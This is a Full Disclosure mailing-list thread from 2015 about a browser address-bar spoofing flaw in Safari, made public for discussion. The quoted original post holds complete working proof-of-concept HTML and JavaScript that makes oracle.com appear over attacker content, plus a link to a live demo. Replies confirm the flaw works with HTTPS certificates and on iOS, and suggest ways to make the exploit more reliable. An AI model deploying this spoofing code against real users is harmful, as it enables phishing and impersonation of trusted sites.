Yes this is a pretty good find. I can also confirm it works on iOS 8.3 (12F69) with Safari.
DW Sent from my iPad > On Jul 2, 2015, at 9:33 AM, Mustafa Al-Bassam <m...@musalbas.com> wrote: > > That's pretty neat. Played around with this and made a few discoveries. > > 1. It shows a valid certificate when you spoof HTTPS sites. That's really > bad. POC/screenshot: https://github.com/musalbas/address-spoofing-poc > > 2. The page isn't responsive when using this flaw. That means you can't spoof > a login box for example. (I tried.) > > 3. The success of the exploit seems to depend on if the browser can start > loading content.html fast enough. I noticed that the exploit works 100% of > the time when used locally. Perhaps a better version of the exploit would > somehow preload content.html - for example by opening a window with an URL > that starts with javascript: followed by a script to display the content? > That, or perhaps reducing the interval time for trying to run next() after > the popup is created. > > I wonder if this works on any other browsers? > > MustafaOn 30 Jun 2015 7:08 am, David Leo <david....@deusen.co.uk> wrote: >> >> Impact: >> The "click to verify" thing is completely broken... >> Anyone can be "BBB Accredited Business" etc. >> You can make whitehouse.gov display "We love Islamic State" :-) >> >> Note: >> No user interaction on the fake page. >> >> Code: >> ***** index.html >> <script> >> function next() >> { >> w.location.replace('http://www.oracle.com/index.html?'+n);n++; >> setTimeout("next();",15); >> setTimeout("next();",25); >> } >> function f() >> { >> w=window.open("content.html","_blank","width=500 height=500"); >> i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5); >> >> } >> </script> >> <a href="#" onclick="f()">Go</a><br> >> ***** content.html >> <b>This web page is NOT oracle.com</b> >> <script>location="http://www.oracle.com/index.html";</script> >> ***** It's online >> http://www.deusen.co.uk/items/gwhere.6128645971389012/ >> (The page says "June/16/2015" - it works as we tested today) >> >> Request For Comment: >> We reported this to Google. >> They reproduced, and say >> It's DoS which doesn't matter. >> We think it's very strange, >> since the browser does not crash(not DoS), >> and the threat is obvious. >> What's your opinion? >> >> Kind Regards, >> >> PS >> We love clever tricks. >> We love this: >> http://dieyu.org/ >> >> >> _______________________________________________ >> Sent through the Full Disclosure mailing list >> https://nmap.org/mailman/listinfo/fulldisclosure >> Web Archives & RSS: http://seclists.org/fulldisclosure/ > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/